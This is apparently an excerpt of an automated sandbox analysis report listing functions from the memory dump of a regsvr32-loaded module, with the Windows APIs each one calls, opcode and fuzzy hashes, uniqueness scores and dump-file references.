Opcode Fuzzy Hash: 1d8870bc97b3dafc5db3ea0ba97cbef15424f58a1b777eb59c0d3835f179ad2f
Instruction Fuzzy Hash: 555165A2F1468191EE00DBA9D48876C2361FB457F4F845635DE6E67BE9DEBCE084C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DDC3B0, Relevance: 9.3, APIs: 6, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF983DDC0E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDC121
Part of subcall function 00007FF983DDC0E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDC1A1
Part of subcall function 00007FF983DDC0E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDC1F5
Part of subcall function 00007FF983DDC0E0: _get_daylight.LIBCMT ref: 00007FF983DDC24D

GetLastError.KERNEL32 ref: 00007FF983DDC536
GetFileType.KERNEL32 ref: 00007FF983DDC54B
GetLastError.KERNEL32 ref: 00007FF983DDC555
CloseHandle.KERNEL32 ref: 00007FF983DDC588
CloseHandle.KERNEL32 ref: 00007FF983DDC6E3
GetLastError.KERNEL32 ref: 00007FF983DDC727

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorLast_invalid_parameter_noinfo$CloseHandle$FileType_get_daylight
String ID:
API String ID: 4200888154-0
Opcode ID: 71f01104ff7e3a4af0a771ffe0c5fecb5d798a2d4bbd121972654079ddaa2c07
Instruction ID: 714502aced33693a301b89102243c7bade80aa2b1ea78ed2ab69dc9006572c7b
Opcode Fuzzy Hash: 71f01104ff7e3a4af0a771ffe0c5fecb5d798a2d4bbd121972654079ddaa2c07
Instruction Fuzzy Hash: C2C18F77B24A4186EB10CFA4D490BAC3761FB49B98F955229DA1FA77D4CF78E05AC300

Uniqueness

Uniqueness Score: 0.36%

Function 00007FF983DD5238, Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD5279
GetConsoleMode.KERNEL32 ref: 00007FF983DD5338
GetLastError.KERNEL32 ref: 00007FF983DD53B8

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: d27a3087f713875c07f38d0daf1d19095cdd71fc549a9495fc9aa82f8085af1c
Instruction ID: 5431087f2c46e195b321973265ad1286e17ebfd6e3e163232a87d4d48d69310d
Opcode Fuzzy Hash: d27a3087f713875c07f38d0daf1d19095cdd71fc549a9495fc9aa82f8085af1c
Instruction Fuzzy Hash: E481B3A2E1960296FB10DBE59450BBC3661FB44794FC84139DA0FA7791DFBCB44AC310

Uniqueness

Uniqueness Score: 5.54%

Function 00007FF983D91880, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 29sleepUNIQUE

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00007FF983D918BE

Part of subcall function 00007FF983D91880: SHGetFolderPathW.SHELL32 ref: 00007FF983D91513

Strings

61bb4cbabdd66e2dcc8fbf965c36bffc4f96bb75, xrefs: 00007FF983D918D8
e91409581de93eb534aecf6396dc12a19dec88a0, xrefs: 00007FF983D91532

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPathSleep
String ID: 61bb4cbabdd66e2dcc8fbf965c36bffc4f96bb75$e91409581de93eb534aecf6396dc12a19dec88a0
API String ID: 335171155-4265678583
Opcode ID: e9b3df1ba1e8ecfc405acaa2db9f3a957c062e15f7238413bcfe1d0abedcef11
Instruction ID: 5ddaec4b807e32dd9d9278991ca2165a8fc3c79ebed9cb997eb78d3b324680a1
Opcode Fuzzy Hash: e9b3df1ba1e8ecfc405acaa2db9f3a957c062e15f7238413bcfe1d0abedcef11
Instruction Fuzzy Hash: 83014F32A14B41A6E710DFA1EC407EA73A5FB44388F841529EA4D97AA5DFB8E119C740

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DAB8D0, Relevance: 3.1, APIs: 2, Instructions: 120UNIQUE

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DABA52
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF983DABA58

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: b381ea4965073199c6f8d63d4c44edd4b43817c2b95fac7f7c15a69ee046a0c9
Instruction ID: 914cee4f5ba103f08198d204c2655a899dae14379298a1e0cdd78d1077efd8b0
Opcode Fuzzy Hash: b381ea4965073199c6f8d63d4c44edd4b43817c2b95fac7f7c15a69ee046a0c9
Instruction Fuzzy Hash: FB4117A171978181EE10DB519544B696258FF08BE4F880738DE7E977D5DEBCF056C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB8AEE, Relevance: 3.1, APIs: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C8E

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 56d8f0dccdde754d40d0bae3878d9644bd5e5925c4c6d921d62358b75234aed1
Instruction ID: ec5acd95fc28d448a3d3e78b9f80cf5a24db694d794d2c9afdc3de2a4c025219
Opcode Fuzzy Hash: 56d8f0dccdde754d40d0bae3878d9644bd5e5925c4c6d921d62358b75234aed1
Instruction Fuzzy Hash: 602193E2B106C184EE10DBB8D4897AC2212BB457F4F848235DA3D5BBD9DEBCE085C204

Uniqueness

Uniqueness Score: 0.11%

Function 00007FF983DD95D4, Relevance: 3.1, APIs: 2, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00007FF983DD95ED
FreeEnvironmentStringsW.KERNEL32 ref: 00007FF983DD96B1

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 04cbaadb2a6dd25d9b6774af6319fe9db2bfec6af2eb1e02e04f5da83b9a374a
Instruction ID: fb0edeab6cb94073b49d228a124a8e4262298780945231733cb94312f8cd2aa8
Opcode Fuzzy Hash: 04cbaadb2a6dd25d9b6774af6319fe9db2bfec6af2eb1e02e04f5da83b9a374a
Instruction Fuzzy Hash: B6218461A1879182EA20DF52A440B2976A4BB94BD0B8C4139DE8FB3B99DF7DF456C300

Uniqueness

Uniqueness Score: 0.05%

Function 00007FF983DD4DBC, Relevance: 3.1, APIs: 2, Instructions: 74fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF983DD4E6F
GetLastError.KERNEL32 ref: 00007FF983DD4E8B

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 89602d41ad2ed2eafb40d490e5d29d35eb46ddb6a982fe4b6a6d68275eb0f81d
Instruction ID: b2ec2d80157b7a06f201b9950d182eb2f19606b1b1ebcb8a1d44c8205b8be0db
Opcode Fuzzy Hash: 89602d41ad2ed2eafb40d490e5d29d35eb46ddb6a982fe4b6a6d68275eb0f81d
Instruction Fuzzy Hash: E331C472A08A819BDB50CF55E440BA977A0F758780F884039DA4ED3755DF7CE41AC700

Uniqueness

Uniqueness Score: 0.04%

Function 00007FF983DD3968, Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00007FF983DD39AC
GetLastError.KERNEL32 ref: 00007FF983DD39B6

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3abf0dc9fd5f891ced624ec51d1ccfb61155d43bd67a41c6385aa0a755b7a3b9
Instruction ID: db9c685c0aba3831b8cc8e228b869ad647365a114d06a80482f88a0694458035
Opcode Fuzzy Hash: 3abf0dc9fd5f891ced624ec51d1ccfb61155d43bd67a41c6385aa0a755b7a3b9
Instruction Fuzzy Hash: D001C6E2A18A4242EF10DB65A4447786721BB41BB0FD81339EA7FA77D4CE7CE05AC300

Uniqueness

Uniqueness Score: 0.36%

Function 00007FF983DD47EC, Relevance: 2.6, APIs: 2, Instructions: 55COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF983DD4852
GetLastError.KERNEL32 ref: 00007FF983DD485C

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 8b0cf069ecff95a1d4bc6300deaaf3f2d4d7eff723277d176c1a770d3e0deddc
Instruction ID: 26b771b9a31ad7a1cb40a0d44d478a765f6ee11e6790d44bb54889e9b759eb8b
Opcode Fuzzy Hash: 8b0cf069ecff95a1d4bc6300deaaf3f2d4d7eff723277d176c1a770d3e0deddc
Instruction Fuzzy Hash: B31163A1F1868243EE90D7A49595B7826A27F847A5F8C023DD52FE62C3CEECB45DC201

Uniqueness

Uniqueness Score: 0.92%

Function 00007FF983DAB330, Relevance: 1.7, APIs: 1, Instructions: 162COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DAB572

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 66298508653a3581e4e57949172bb3409b8a8406d6c769c73cefad1254015f87
Instruction ID: 80ff3524e3ea7e2b784f87037562159d88ee05f06ea85466f829d038fa209ff8
Opcode Fuzzy Hash: 66298508653a3581e4e57949172bb3409b8a8406d6c769c73cefad1254015f87
Instruction Fuzzy Hash: F761AF62B15A5584EB00CBB0D540ABD3775FB04B48F94542ADE4EA3B58DBB8E18AC340

Uniqueness

Uniqueness Score: 0.11%

Function 00007FF983DC17A8, Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DC17EA

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f0cd2609e3af1ee320f86908ff88d3957b697c49a999549a78f4ade4815074b4
Instruction ID: 25e47fa07d65a86e6fe21b85556e51688e10f241f273ac45b640015c7fa6eecb
Opcode Fuzzy Hash: f0cd2609e3af1ee320f86908ff88d3957b697c49a999549a78f4ade4815074b4
Instruction Fuzzy Hash: EC41F6E1B1826685EA54D9B65500B39B281BF04FA0F9C5638DD6FA77C5CEBCF84BC200

Uniqueness

Uniqueness Score: 0.14%

Function 00007FF983DD514C, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc4d8c2722bea0676e79132f13795ba2e807be06959329446b5923c7478e7ff7
Instruction ID: 73a289f18ccf4d0afb1138c4a79bb25393a811ab39f3a40e533bda4406211846
Opcode Fuzzy Hash: bc4d8c2722bea0676e79132f13795ba2e807be06959329446b5923c7478e7ff7
Instruction Fuzzy Hash: 3621A0A2A1924146E611DFA59841B7C3A55BB417A0FD94239EA1EA73D2CFBCF44BC700

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DD3784, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0432bd87d15c28d9346f17ec9fb7566c22da78545eee12969034a50ea6e0707
Instruction ID: d9f9e8592626ba0b7d4675706a9e2bec63de92427be7d434714ec307a80d323d
Opcode Fuzzy Hash: b0432bd87d15c28d9346f17ec9fb7566c22da78545eee12969034a50ea6e0707
Instruction Fuzzy Hash: 032171A3E1824146FB11EBA19841B683654BB40BB0FC9423DE92EA73D2CEBCF457C700

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DDBD88, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDBDAB

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 02cb021fd560143362c8cf4732d2d637891e2a298da59e892857b8cded576154
Instruction ID: af47ef0bf24e8d162c536a316d893b61464690457d20eb68a67b864da4ceca5e
Opcode Fuzzy Hash: 02cb021fd560143362c8cf4732d2d637891e2a298da59e892857b8cded576154
Instruction Fuzzy Hash: 3C21B3B2A0864187DB61CF68D440B7976A0FB84B58F984238DB5F976D9DF7DE405CB00

Uniqueness

Uniqueness Score: 0.14%

Function 00007FF983DC0A94, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DC0AC5

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 092f86bd6f5588a0361e8f0b995989dfb593956ac1ba0dd867d5b9bfca474b8e
Instruction ID: 0acc0bd639a384c8d2b15adf026fbe529042d6b02c0e6584fbd6bbf5d9359e0c
Opcode Fuzzy Hash: 092f86bd6f5588a0361e8f0b995989dfb593956ac1ba0dd867d5b9bfca474b8e
Instruction Fuzzy Hash: D0116262A2864181EA61DFE19400B7DA264BB55B84FCC4039EB4EF7786CEBDF54AC740

Uniqueness

Uniqueness Score: 0.14%

Function 00007FF983DD5A5C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD5A87

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 69c0246e260bdb653590928fd4eed2362b1d82414a1d70ae38570950e5dc5001
Instruction ID: 3fe97c6080e77204e1255be8e7a0f7d992ef640c2bac5e2050a5a7705927d0f7
Opcode Fuzzy Hash: 69c0246e260bdb653590928fd4eed2362b1d82414a1d70ae38570950e5dc5001
Instruction Fuzzy Hash: 8C1181B191A65283E310CB54A480B297361FB40740F9D1138E65EE7792DFBCF816C700

Uniqueness

Uniqueness Score: 0.14%

Function 00007FF983DD4748, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a0083a2ecba2dbbb083b270186ed0c5750a5b595065498c73e79f8854996af
Instruction ID: b2fa0509686c06df605ec9918e42e5b820bd65edb55b38aeb7ac2bcce9a1d6fc
Opcode Fuzzy Hash: 08a0083a2ecba2dbbb083b270186ed0c5750a5b595065498c73e79f8854996af
Instruction Fuzzy Hash: 8D1190F291864292D651DF90D5407AD7760FB81750FD8423AE24EA63DACFBCF00AC740

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DC161C, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DC1639

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 08d78ef2bf650b68f1d6e1c73591310f35e4781cab247b4edca797da1a237e67
Instruction ID: 44ae49944c7254c61ce413fb6bcf2a59ffd4eea5954772bd095d004f640b514f
Opcode Fuzzy Hash: 08d78ef2bf650b68f1d6e1c73591310f35e4781cab247b4edca797da1a237e67
Instruction Fuzzy Hash: 620184A1E2861242FE14EAF59411BB91150BF85764F9D1738E92BE73C3CEACF40BC640

Uniqueness

Uniqueness Score: 0.14%

Function 00007FF983DC1954, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DC1989

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: fa9f582d3ef518a7e2dae39603b05c661a4188fc51b27e780d0270c7b83ce9d8
Instruction ID: 451df310677f886168dbde6f3091477b78f6042d2d72190ac1550bbf418b3e47
Opcode Fuzzy Hash: fa9f582d3ef518a7e2dae39603b05c661a4188fc51b27e780d0270c7b83ce9d8
Instruction Fuzzy Hash: FB015EB2A10B1688EB10CFB0D4409EC37B8FB14748F981539DA5E63748EF78E56AC380

Uniqueness

Uniqueness Score: 0.14%

Function 00007FF983DD58D8, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF983DD592D

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
